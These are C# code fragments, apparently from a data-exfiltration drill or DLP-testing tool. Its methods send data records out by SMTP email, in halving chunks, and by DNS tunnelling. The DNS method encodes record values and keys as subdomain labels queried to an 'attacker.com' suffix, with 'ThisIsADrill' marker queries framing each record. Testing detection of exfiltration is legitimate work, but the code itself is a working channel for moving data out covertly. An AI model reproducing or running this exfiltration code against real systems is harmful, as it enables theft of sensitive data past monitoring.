public int SendDecrementalEmails(DataRecordCollection data, string destination) { int sent = 0; int current_chunk = data.GetShape().Rows; while (sent < data.GetShape().Rows) { current_chunk /= 2; if (current_chunk == 0) { ++current_chunk; //we need at least one more record if its here and the chunk size is zero } int records_to_send = 0; if (sent + current_chunk >= data.GetShape().Rows) { records_to_send = data.GetShape().Rows - sent; } else { records_to_send = current_chunk; } DataRecordCollection drc = new DataRecordCollection(data.Schema); foreach (DataRecord d in data.GetRecords().Skip(sent).Take(records_to_send)) { drc.AddRecord(d); } SendAllRecords(drc, destination); sent += records_to_send; } return(sent); }
public int Send(DataRecordCollection data, string destination) { int sent = 0; foreach (DataRecord d in data.GetRecords()) { string sending_body = email_body + d.ToString(); SendMailItem(destination, sending_body); sent++; } return(sent); }
/// <summary> ///this will perform a sequence of DNS querys, which are roughly equivalent to doing the following: /// /// GetHostEntry("ThisIsADrill.ThisIsADrill.ThisIsADrill.attacker.com") /// GetHostEntry("[val1].[key1].[rec1].attacker.com") /// GetHostEntry("[val2].[key2].[rec2].attacker.com") /// GetHostEntry("[val3].[key3].[rec3].attacker.com") /// GetHostEntry("[val-n].[key-n].[rec-n].attacker.com") /// GetHostEntry("ThisIsADrill.ThisIsADrill.ThisIsADrill.attacker.com") /// /// where 'n' is the number of key value pairs in a record. /// It will repeat this pattern for every piece of exfiltrated data. /// -- /// for eaxmple: /// a DataRecordCollection object with a Shape of 100,5 (that means 100 records, and schema lenght of 5) /// will make a total of 100x5+2=502 dns queryies to the target. /// /// So. in general, it will send a total number of DNS requests equal to: /// records.Shape.Rows x records.Shape.Columns + 2 /// /// /// It will not wait nor care about the response. /// </summary> /// <param name="records">the DataRecordCollection object to exfiltrate</param> /// <param name="target_domain">DNS domain to target. If default, the query will be sent to 'localhost.local'</param> /// /// <param name="base64encode">base 64 encode the values. default is false</param> public int Send(DataRecordCollection data, string custom_name_resolver) { IPAddress t; custom_name_resolver = (!IPAddress.TryParse(custom_name_resolver, out t)) //check if we have been supplied an ip. if so, continue, if not then translate the host name to an ip ? DnsUtils.GetIPFromName(custom_name_resolver) : custom_name_resolver; int items_sent = 0; bool async_mode = ((ops & Options.ASYNCHRONOUS_MODE) != 0); string query; string[] keys = data.GetSchema(); foreach (object o in data.GetRecords()) //iterate through each record in the records list { if (o == null) { continue; } DataRecord dr = (DataRecord)o; string[] vals = dr.Data; query = "ThisIsADrill.ThisIsADrill.ThisIsADrill." + host_suffix; DnsUtils.SendDnsQuery(query, custom_name_resolver, async_mode); items_sent++; for (int i = 0; i < keys.Length; i++) { String key = keys[i]; String val = vals[i]; String recNumber = "rec" + RecordsSent.ToString(); String[] labels = new String[] { val, key, recNumber, SAFETY_WORD + host_suffix }; labels = DnsUtils.MakeLabelsDNSCompliant(labels); query = String.Join(".", labels.ToList()); DnsUtils.SendDnsQuery(query, custom_name_resolver, async_mode); items_sent++; } DnsUtils.SendDnsQuery("ThisIsADrill.ThisIsADrill.ThisIsADrill" + host_suffix, custom_name_resolver, async_mode); items_sent++; } return(items_sent); }
public int Send(DataRecordCollection data, string destination) { int sent = 0; foreach (DataRecord d in data.GetRecords()) { if (d == null) { continue; } var fromAddress = new MailAddress(email_from, email_from.Split('@')[0]); var toAddress = new MailAddress(destination, destination.Split('@')[0]); string email_body = d.ToString(); var smtp = new SmtpClient { Host = server, Port = Port, EnableSsl = ssl, DeliveryMethod = SmtpDeliveryMethod.Network, UseDefaultCredentials = false, Credentials = new NetworkCredential(fromAddress.Address, password) }; using (var msg = new MailMessage(fromAddress, toAddress) { Subject = subject_line, Body = this.body + "\n" + email_body }) { smtp.Send(msg); ++sent; } } return(sent); }